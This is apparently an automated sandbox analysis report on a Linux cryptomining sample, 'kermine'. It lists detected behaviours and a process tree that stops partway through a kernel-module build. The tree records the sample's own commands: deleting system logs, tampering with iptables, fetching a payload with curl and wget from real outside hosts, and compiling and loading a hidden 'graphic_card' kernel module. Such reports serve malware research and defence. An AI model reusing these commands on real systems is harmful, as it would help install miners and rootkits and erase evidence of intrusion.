Resubmissions
18-10-2024 08:32
241018-ke9aaazcrr 10Analysis
-
max time kernel
7s -
max time network
131s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240522.1-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240522.1-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
18-10-2024 08:32
Static task
static1
Behavioral task
behavioral1
Sample
kermine
Resource
ubuntu2204-amd64-20240522.1-en
General
-
Target
kermine
-
Size
1.3MB
-
MD5
13d1ec32d39153bddcb677fc491d90f8
-
SHA1
28f07354c83098f3f2f988249251096bcdf68549
-
SHA256
7f2b4e30c6ae7c56c0bc861f920bca6b52183b3e8bc30347739c6591bdfaa589
-
SHA512
1dbcab16cb408f8c895609af43f973c09b4c0dda5da1f36e2524823b53874cdce585bf4d4d489f9323043f69d688cf3375ad14036e99f0b09c6bdfddf66289b4
-
SSDEEP
24576:87U+XfGMTwJ7RBNytH9wiPGKgIxECVVXZSELt:8g+XfjU7RBNC9wiPGKgIxE8VwE
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Processes:
journalctldescription ioc process File deleted /var/log/journal/f2de92a803c744e586bd87567a26b68a/system@6c7199fc1c384150876b09fb37bc9c7e-0000000000000001-0006190624fa88cb.journal journalctl -
Processes:
insmodioc pid process /tmp/a/graphic_card.ko 1968 insmod -
OS Credential Dumping 1 TTPs 1 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
Processes:
sudodescription ioc process File opened for reading /etc/shadow sudo -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Processes:
rmrmrmrmdescription ioc process File deleted /var/log/syslog* rm File deleted /var/log/messages* rm File deleted /var/log/secure* rm File deleted /var/log/auth.log* rm -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads list of loaded kernel modules 1 TTPs 2 IoCs
Reads the list of currently loaded kernel modules, possibly to detect virtual environments.
Processes:
grepgrepdescription ioc process File opened for reading /proc/modules grep File opened for reading /proc/modules grep -
Command and Scripting Interpreter: Unix Shell 1 TTPs 39 IoCs
Execute scripts via Unix Shell.
Processes:
shshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshpid process 1680 sh 1879 sh 1889 sh 1902 sh 1922 sh 1948 sh 1882 sh 1887 sh 1892 sh 1914 sh 1931 sh 1967 sh 1894 sh 1924 sh 1929 sh 1936 sh 1965 sh 1674 sh 1676 sh 1678 sh 1884 sh 1915 sh 1934 sh 1896 sh 1897 sh 1904 sh 1925 sh 1926 sh 1950 sh 1899 sh 1671 sh 1874 sh 1877 sh 1917 sh 1870 sh 1916 sh 1923 sh 1943 sh 1945 sh -
Processes:
pidofmkdirawkinsmodawkmkdirawkxargsxargssudomkdirmkdirmvxargsgrepdescription ioc process File opened for reading /proc/1382/stat pidof File opened for reading /proc/filesystems mkdir File opened for reading /proc/376/stat pidof File opened for reading /proc/643/stat pidof File opened for reading /proc/92/cmdline pidof File opened for reading /proc/425/cmdline pidof File opened for reading /proc/768/stat pidof File opened for reading /proc/4/cmdline pidof File opened for reading /proc/16/cmdline pidof File opened for reading /proc/588/cmdline pidof File opened for reading /proc/1143/stat pidof File opened for reading /proc/1213/cmdline pidof File opened for reading /proc/1382/cmdline pidof File opened for reading /proc/self/maps awk File opened for reading /proc/23/cmdline pidof File opened for reading /proc/852/cmdline pidof File opened for reading /proc/632/stat pidof File opened for reading /proc/cmdline insmod File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems mkdir File opened for reading /proc/12/cmdline pidof File opened for reading /proc/76/stat pidof File opened for reading /proc/528/cmdline pidof File opened for reading /proc/1085/cmdline pidof File opened for reading /proc/self/maps awk File opened for reading /proc/self/fd xargs File opened for reading /proc/78/cmdline pidof File opened for reading /proc/262/cmdline pidof File opened for reading /proc/90/stat pidof File opened for reading /proc/209/cmdline pidof File opened for reading /proc/218/cmdline pidof File opened for reading /proc/411/stat pidof File opened for reading /proc/1170/stat pidof File opened for reading /proc/self/fd xargs File opened for reading /proc/79/cmdline pidof File opened for reading /proc/963/stat pidof File opened for reading /proc/1558/stat pidof File opened for reading /proc/1657/stat pidof File opened for reading /proc/10/cmdline pidof File opened for reading /proc/14/cmdline pidof File opened for reading /proc/self/stat sudo File opened for reading /proc/858/cmdline pidof File opened for reading /proc/991/cmdline pidof File opened for reading /proc/202/stat pidof File opened for reading /proc/filesystems mkdir File opened for reading /proc/872/stat pidof File opened for reading /proc/4/stat pidof File opened for reading /proc/590/stat pidof File opened for reading /proc/27/stat pidof File opened for reading /proc/1143/cmdline pidof File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems mv File opened for reading /proc/self/fd xargs File opened for reading /proc/411/cmdline pidof File opened for reading /proc/590/cmdline pidof File opened for reading /proc/filesystems sudo File opened for reading /proc/1050/stat pidof File opened for reading /proc/self/maps grep File opened for reading /proc/656/stat pidof File opened for reading /proc/94/stat pidof File opened for reading /proc/101/stat pidof File opened for reading /proc/96/stat pidof File opened for reading /proc/1554/stat pidof File opened for reading /proc/99/stat pidof -
System Network Configuration Discovery 1 TTPs 46 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
ldrmcurlshrmpahole-flags.shmakeshshcurlstatwgetshshshshpahole-flags.shpahole-flags.shmvmvwgetpahole-flags.shshrmcurlrmpahole-flags.shshshrmshshshshshshshmakemvmvrmshmakewgetunzipsedpid process 1966 ld 1637 rm 1642 curl 1915 sh 1652 rm 1900 pahole-flags.sh 1906 make 1914 sh 1931 sh 1633 curl 1634 stat 1636 wget 1967 sh 1916 sh 1917 sh 1922 sh 1932 pahole-flags.sh 1946 pahole-flags.sh 1626 mv 1625 mv 1644 wget 1880 pahole-flags.sh 1926 sh 1635 rm 1638 curl 1639 rm 1890 pahole-flags.sh 1945 sh 1965 sh 1643 rm 1671 sh 1879 sh 1924 sh 1899 sh 1923 sh 1925 sh 1938 sh 1957 make 1569 mv 1568 mv 1641 rm 1889 sh 1952 make 1640 wget 1651 unzip 1673 sed -
Writes file to tmp directory 64 IoCs
Malware often drops required files in the /tmp directory.
Processes:
cc1asbashcc1asgccshasgccgccgcccc1asgccgccasshgccgcccc1ascc1asgccshgcccc1cc1ascc1cc1wgetgccgccasasasascc1asaswgetcc1ascc1asldasastouchcc1gccshasasgcccc1cc1gccgccascc1description ioc process File opened for modification /tmp/ccgmGTtF.s cc1 File opened for modification /tmp/a/.tmp_1852/tmp as File opened for modification /tmp/a/graphic_card.h bash File opened for modification /tmp/ccZj0wKQ.s cc1 File opened for modification /tmp/a/.tmp_1770/tmp as File opened for modification /tmp/cckdoJf4.s gcc File opened for modification /tmp/a/graphic_card.mod sh File opened for modification /tmp/a/.tmp_1702/tmp as File opened for modification /tmp/ccBOSuZ3.s gcc File opened for modification /tmp/cczamULp.s gcc File opened for modification /tmp/ccgmGTtF.s gcc File opened for modification /tmp/ccSlVB1F.s cc1 File opened for modification /tmp/a/.tmp_1683/tmp as File opened for modification /tmp/cc1Dv5N3.s gcc File opened for modification /tmp/ccOeuSbG.s gcc File opened for modification /tmp/a/.tmp_1786/tmp as File opened for modification /tmp/a/modules.order sh File opened for modification /tmp/a/graphic_card.c bash File opened for modification /tmp/cckibGVV.s gcc File opened for modification /tmp/cc72BOqk.s gcc File opened for modification /tmp/cckZeuoX.s cc1 File opened for modification /tmp/a/.tmp_1695/tmp as File opened for modification /tmp/ccouq4a4.s cc1 File opened for modification /tmp/a/.tmp_1732/tmp as File opened for modification /tmp/ccJi1DDs.s gcc File opened for modification /tmp/a/.graphic_card.mod.o.cmd sh File opened for modification /tmp/cc2vUQVb.s gcc File opened for modification /tmp/ccvviN1Y.s cc1 File opened for modification /tmp/ccrqeBOo.s cc1 File opened for modification /tmp/a/.tmp_1726/tmp as File opened for modification /tmp/cckibGVV.s cc1 File opened for modification /tmp/cc3FYCAT.s cc1 File opened for modification /tmp/pn.zip wget File opened for modification /tmp/ccIWH5SU.s gcc File opened for modification /tmp/ccr7ECdW.s gcc File opened for modification /tmp/a/.tmp_1808/tmp as File opened for modification /tmp/a/.tmp_1858/tmp as File opened for modification /tmp/a/graphic_card.o as File opened for modification /tmp/a/graphic_card.mod.o as File opened for modification /tmp/cc1Dv5N3.s cc1 File opened for modification /tmp/a/.tmp_1714/tmp as File opened for modification /tmp/a/.tmp_1864/tmp as File opened for modification /tmp/pn.zip wget File opened for modification /tmp/cckdoJf4.s cc1 File opened for modification /tmp/a/.tmp_1833/tmp as File opened for modification /tmp/a/.graphic_card.o.d cc1 File opened for modification /tmp/a/.tmp_1764/tmp as File opened for modification /tmp/a/.tmp_1744/tmp ld File opened for modification /tmp/a/.tmp_1752/tmp as File opened for modification /tmp/a/.tmp_1846/tmp as File opened for modification /tmp/a/Module.symvers touch File opened for modification /tmp/cc2vUQVb.s cc1 File opened for modification /tmp/cc31Gi3h.s gcc File opened for modification /tmp/a/.graphic_card.ko.cmd sh File opened for modification /tmp/a/.tmp_1689/tmp as File opened for modification /tmp/a/.tmp_1738/tmp as File opened for modification /tmp/a/.graphic_card.mod.cmd sh File opened for modification /tmp/cckvFWki.s gcc File opened for modification /tmp/cc0J18e8.s cc1 File opened for modification /tmp/ccJi1DDs.s cc1 File opened for modification /tmp/ccrqeBOo.s gcc File opened for modification /tmp/cc3FYCAT.s gcc File opened for modification /tmp/a/.tmp_1744/tmp as File opened for modification /tmp/ccr7ECdW.s cc1
Processes
-
/tmp/kermine/tmp/kermine1⤵PID:1558
-
/bin/bash/bin/bash /dev/fd/31⤵
- Writes file to tmp directory
PID:1558 -
/usr/bin/rmrm -rf /var/www/html/config.json2⤵PID:1560
-
-
/usr/bin/rmrm -rf /root/.xmrig.json2⤵PID:1561
-
-
/usr/bin/rmrm -rf /root/.config/xmrig.json2⤵PID:1562
-
-
/usr/bin/rmrm -rf "/var/log/messages*"2⤵
- Deletes log files
PID:1563
-
-
/usr/bin/rmrm -rf "/var/log/secure*"2⤵
- Deletes log files
PID:1564
-
-
/usr/bin/rmrm -rf "/var/log/auth.log*"2⤵
- Deletes log files
PID:1565
-
-
/usr/bin/rmrm -rf "/var/log/syslog*"2⤵
- Deletes log files
PID:1566
-
-
/usr/sbin/sysctlsysctl -p2⤵PID:1567
-
-
/usr/bin/sleepsleep 12⤵PID:1570
-
-
/usr/bin/mvmv /sbin/tokens /sbin/iptables2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/mvmv /usr/sbin/tokens /usr/sbin/iptables2⤵
- System Network Configuration Discovery
PID:1568
-
-
/usr/bin/grepgrep 138.682⤵PID:1590
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1592
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1591
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1596
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1595
-
-
/usr/bin/grepgrep 67.2072⤵PID:1594
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1600
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1599
-
-
/usr/bin/grepgrep 46.1012⤵PID:1598
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1603
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1604
-
-
/usr/bin/grepgrep 157.2452⤵PID:1602
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1608
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1607
-
-
/usr/bin/grepgrep 146.1902⤵PID:1606
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1612
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1611
-
-
/usr/bin/grepgrep 144.1262⤵PID:1610
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1616
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1615
-
-
/usr/bin/grepgrep 167.1722⤵PID:1614
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1620
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1619
-
-
/usr/bin/grepgrep 172.1042⤵PID:1618
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1624
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1623
-
-
/usr/bin/grepgrep 172.1052⤵PID:1622
-
-
/usr/bin/mvmv /sbin/iptables /sbin/tokens2⤵
- System Network Configuration Discovery
PID:1626
-
-
/usr/bin/mvmv /usr/sbin/iptables /usr/sbin/tokens2⤵
- System Network Configuration Discovery
PID:1625
-
-
/usr/bin/mkdirmkdir /etc/ad12e85f2⤵PID:1627
-
-
/usr/bin/headhead -c 82⤵PID:1631
-
-
/usr/bin/md5summd5sum2⤵PID:1630
-
-
/usr/bin/catcat /usr/share/dbus-1/interfaces.conf2⤵PID:1632
-
-
/usr/bin/curlcurl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :9090 http://example.established.site/pn.zip2⤵
- System Network Configuration Discovery
PID:1633
-
-
/usr/bin/statstat "-c%s" /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1634
-
-
/usr/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1635
-
-
/usr/bin/wgetwget "--timeout=5" "--tries=2" http://example.established.site/pn.zip -q -O /tmp/pn.zip2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1636
-
-
/usr/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1637
-
-
/usr/bin/curlcurl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :1081 http://example.established.site/pn.zip2⤵
- System Network Configuration Discovery
PID:1638
-
-
/usr/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1639
-
-
/usr/bin/wgetwget "--timeout=5" "--tries=2" http://w.amax.fun/pn.zip -q -O /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1640
-
-
/usr/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1641
-
-
/usr/bin/curlcurl --connect-timeout 500 -s -o /tmp/pn.zip --socks5-hostname :9090 http://172.104.170.240/pn.zip2⤵
- System Network Configuration Discovery
PID:1642
-
-
/usr/bin/rmrm -rf /tmp/pn.zip2⤵
- System Network Configuration Discovery
PID:1643
-
-
/usr/bin/wgetwget "--timeout=50" "--tries=2" http://172.104.170.240/pn.zip -q -O /tmp/pn.zip2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1644
-
-
/usr/bin/unzipunzip -qq -o pn.zip2⤵
- System Network Configuration Discovery
PID:1651
-
-
/usr/bin/rmrm -rf pn.zip2⤵
- System Network Configuration Discovery
PID:1652
-
-
/usr/bin/mvmv graphic_card /etc/ad12e85f/graphic_card2⤵PID:1653
-
-
/usr/bin/cpcp /etc/ad12e85f/graphic_card /5074abca2⤵PID:1654
-
-
/usr/bin/sleepsleep 22⤵PID:1656
-
-
/5074abca/5074abca2⤵PID:1655
-
-
/usr/bin/pidofpidof 5074abca2⤵
- Reads runtime system information
PID:1657
-
-
/usr/bin/touchtouch -r /usr/share/dbus-1/system.conf /usr/share/dbus-1/interfaces.conf2⤵PID:1658
-
-
/usr/bin/rmrm -rf /5074abca2⤵PID:1659
-
-
/usr/bin/grepgrep -q graphic_card /proc/modules2⤵
- Reads list of loaded kernel modules
PID:1660
-
-
/usr/bin/mkdirmkdir /tmp/a2⤵PID:1661
-
-
/usr/bin/catcat2⤵PID:1662
-
-
/usr/bin/sedsed -i -es/hhide/ad12e85f/ /tmp/a/graphic_card.h2⤵PID:1664
-
-
/usr/bin/catcat2⤵PID:1665
-
-
/usr/bin/unameuname -r2⤵PID:1667
-
-
/usr/bin/catcat2⤵PID:1666
-
-
/usr/bin/touchtouch /tmp/a/Module.symvers2⤵
- Writes file to tmp directory
PID:1668
-
-
/usr/bin/unameuname -r2⤵PID:1669
-
-
/usr/bin/makemake -C /lib/modules/5.15.0-105-generic/build "M=/tmp/a" modules2⤵PID:1670
-
/bin/sh/bin/sh -c "uname -m | sed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e s/arm.*/arm/ -e s/sa110/arm/ -e s/s390x/s390/ -e s/ppc.*/powerpc/ -e s/mips.*/mips/ -e s/sh[234].*/sh/ -e s/aarch64.*/arm64/ -e s/riscv.*/riscv/"3⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1671 -
/usr/bin/sedsed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e "s/arm.*/arm/" -e s/sa110/arm/ -e s/s390x/s390/ -e "s/ppc.*/powerpc/" -e "s/mips.*/mips/" -e "s/sh[234].*/sh/" -e "s/aarch64.*/arm64/" -e "s/riscv.*/riscv/"4⤵
- System Network Configuration Discovery
PID:1673
-
-
/usr/bin/unameuname -m4⤵PID:1672
-
-
-
/bin/sh/bin/sh -c "getconf LFS_CFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1674 -
/usr/bin/getconfgetconf LFS_CFLAGS4⤵PID:1675
-
-
-
/bin/sh/bin/sh -c "getconf LFS_LDFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1676 -
/usr/bin/getconfgetconf LFS_LDFLAGS4⤵PID:1677
-
-
-
/bin/sh/bin/sh -c "getconf LFS_LIBS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1678 -
/usr/bin/getconfgetconf LFS_LIBS4⤵PID:1679
-
-
-
/bin/sh/bin/sh -c "LC_ALL=C gcc --version 2>/dev/null | head -n 1"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1680 -
/usr/bin/headhead -n 14⤵PID:1682
-
-
/usr/bin/gccgcc --version4⤵PID:1681
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-extern -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-extern -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1683
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16834⤵PID:1684
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-extern" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1683/tmp4⤵PID:1685
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1683/ -dumpbase tmp "-mindirect-branch=thunk-extern" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccZvY0wD.s5⤵PID:1686
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1683/tmp /tmp/ccZvY0wD.s5⤵PID:1687
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1683/tmp /tmp/ccZvY0wD.s5⤵PID:1687
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1683/tmp /tmp/ccZvY0wD.s5⤵PID:1687
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1683/tmp /tmp/ccZvY0wD.s5⤵
- Writes file to tmp directory
PID:1687
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16834⤵PID:1688
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch-cs-prefix -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch-cs-prefix\"; else echo \"\"; fi"3⤵PID:1689
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16894⤵PID:1690
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mindirect-branch-cs-prefix -c -x c /dev/null -o /tmp/a/.tmp_1689/tmp4⤵
- Writes file to tmp directory
PID:1691 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1689/ -dumpbase tmp -mindirect-branch-cs-prefix "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/cc1Dv5N3.s5⤵
- Writes file to tmp directory
PID:1692
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1689/tmp /tmp/cc1Dv5N3.s5⤵PID:1693
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1689/tmp /tmp/cc1Dv5N3.s5⤵PID:1693
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1689/tmp /tmp/cc1Dv5N3.s5⤵PID:1693
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1689/tmp /tmp/cc1Dv5N3.s5⤵
- Writes file to tmp directory
PID:1693
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16894⤵PID:1694
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mindirect-branch=thunk-inline -mindirect-branch-register -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mindirect-branch=thunk-inline -mindirect-branch-register\"; else echo \"\"; fi"3⤵PID:1695
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_16954⤵PID:1696
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mindirect-branch=thunk-inline" -mindirect-branch-register -c -x c /dev/null -o /tmp/a/.tmp_1695/tmp4⤵
- Writes file to tmp directory
PID:1697 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1695/ -dumpbase tmp "-mindirect-branch=thunk-inline" -mindirect-branch-register "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/cc2vUQVb.s5⤵
- Writes file to tmp directory
PID:1698
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1695/tmp /tmp/cc2vUQVb.s5⤵PID:1699
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1695/tmp /tmp/cc2vUQVb.s5⤵PID:1699
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1695/tmp /tmp/cc2vUQVb.s5⤵PID:1699
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1695/tmp /tmp/cc2vUQVb.s5⤵
- Writes file to tmp directory
PID:1699
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_16954⤵PID:1700
-
-
-
/usr/bin/unameuname -m3⤵PID:1701
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mpreferred-stack-boundary=4 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -mpreferred-stack-boundary=4\"; else echo \"\"; fi"3⤵PID:1702
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17024⤵PID:1703
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-mpreferred-stack-boundary=4" -c -x c /dev/null -o /tmp/a/.tmp_1702/tmp4⤵PID:1704
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1702/ -dumpbase tmp "-mpreferred-stack-boundary=4" "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection -o /tmp/ccfni9lR.s5⤵PID:1705
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1702/tmp /tmp/ccfni9lR.s5⤵PID:1706
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1702/tmp /tmp/ccfni9lR.s5⤵PID:1706
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1702/tmp /tmp/ccfni9lR.s5⤵PID:1706
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1702/tmp /tmp/ccfni9lR.s5⤵
- Writes file to tmp directory
PID:1706
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17024⤵PID:1707
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1708
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17084⤵PID:1709
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1708/tmp4⤵
- Writes file to tmp directory
PID:1710 -
